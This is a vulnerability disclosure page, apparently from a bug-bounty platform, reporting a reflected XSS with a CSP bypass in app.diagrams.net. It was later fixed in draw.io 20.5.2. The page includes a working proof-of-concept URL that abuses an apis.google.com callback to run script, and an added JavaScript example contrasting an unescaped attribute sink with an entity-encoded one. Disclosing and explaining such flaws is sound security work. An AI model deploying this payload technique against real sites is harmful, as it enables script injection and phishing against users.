XSS and CSP bypass in app.diagrams.net in jgraph/drawio

Valid

Reported on

Nov 4th 2022


Description

The application reflects an input from the URL without sanitizing it. With a CSP bypass via apis.google.com it's possible to execute JavaScript code.

Proof of Concept

https://app.diagrams.net/?ui=min&p=tickets#_TICKETS%7B%22ticketsConfig%22%3A%7B%22deskApiKey%22%3A%22teste%22%2C%22deskDomain%22%3A%22teste\%22%3E%3Ciframe%20srcdoc=%27%3Cscript%20src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz%26%23x22;-alert(document.domain)-%26%23x22;%3E%3C/script%3E%27%3Easdfasdf%22%7D%7D

Impact

XSS, Phishing

Occurrences

A fix would be to use mxUtils.htmlEntities(var), as it is used in other places.
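The following is an added example (not draw.io's code and not the report's own PoC) of the pattern the fix suggestion describes: a config value taken from the URL fragment is concatenated into HTML, and the fix is to entity-encode it at the sink. The `htmlEntities` helper here is our own minimal escaper written to mimic what an entity-encoding helper such as mxUtils.htmlEntities does; `parseTicketsConfig`, `renderVulnerable`, `renderHardened` and the sample fragment are all hypothetical, constructed for this demonstration.

```javascript
// Minimal HTML entity encoder. Assumption: this mirrors the behaviour of an
// escaping helper like mxUtils.htmlEntities for the characters that matter
// when a value lands inside an attribute or text node. Not the draw.io code.
function htmlEntities(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must come first so later entities are not re-encoded
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hypothetical parser for a fragment shaped like the one in the report:
// a token prefix followed by URL-encoded JSON carrying a ticketsConfig object.
function parseTicketsConfig(hash) {
  const prefix = '#_TICKETS';
  if (!hash.startsWith(prefix)) return null;
  try {
    const obj = JSON.parse(decodeURIComponent(hash.slice(prefix.length)));
    return obj && obj.ticketsConfig ? obj.ticketsConfig : null;
  } catch (e) {
    return null; // malformed JSON is simply ignored
  }
}

// Vulnerable pattern: attacker-controlled deskDomain is dropped straight into
// an attribute. A double quote in the value closes the attribute and the tag.
function renderVulnerable(cfg) {
  return '<div data-domain="' + cfg.deskDomain + '">Desk</div>';
}

// Hardened pattern: the same markup, but the value is entity-encoded first,
// so quotes and angle brackets survive only as inert text.
function renderHardened(cfg) {
  return '<div data-domain="' + htmlEntities(cfg.deskDomain) + '">Desk</div>';
}

// Constructed sample fragment (not the report's PoC): the deskDomain value
// contains a quote and a tag to show the attribute breakout.
const SAMPLE_HASH = '#_TICKETS' + encodeURIComponent(JSON.stringify({
  ticketsConfig: { deskApiKey: 'key', deskDomain: 'acme"><b>injected</b>' }
}));

// Returns both renderings so the difference can be inspected or asserted on.
function demo(hash) {
  const cfg = parseTicketsConfig(hash);
  return {
    deskDomain: cfg.deskDomain,
    vulnerable: renderVulnerable(cfg),
    hardened: renderHardened(cfg)
  };
}
```

Encoding at the sink is the control that actually matters here: the report notes the CSP was bypassed through apis.google.com, which is a reminder that a policy allow-listing a third-party origin does not substitute for output encoding of reflected input.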

We are processing your report and will contact the jgraph/drawio team within 24 hours. a month ago
David Benson validated this vulnerability 25 days ago

Another good catch

Joao Vitor Maia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson marked this as fixed in 20.5.2 with commit d37894 24 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
tickets.js#L83 has been validated
David Benson published this vulnerability 24 days ago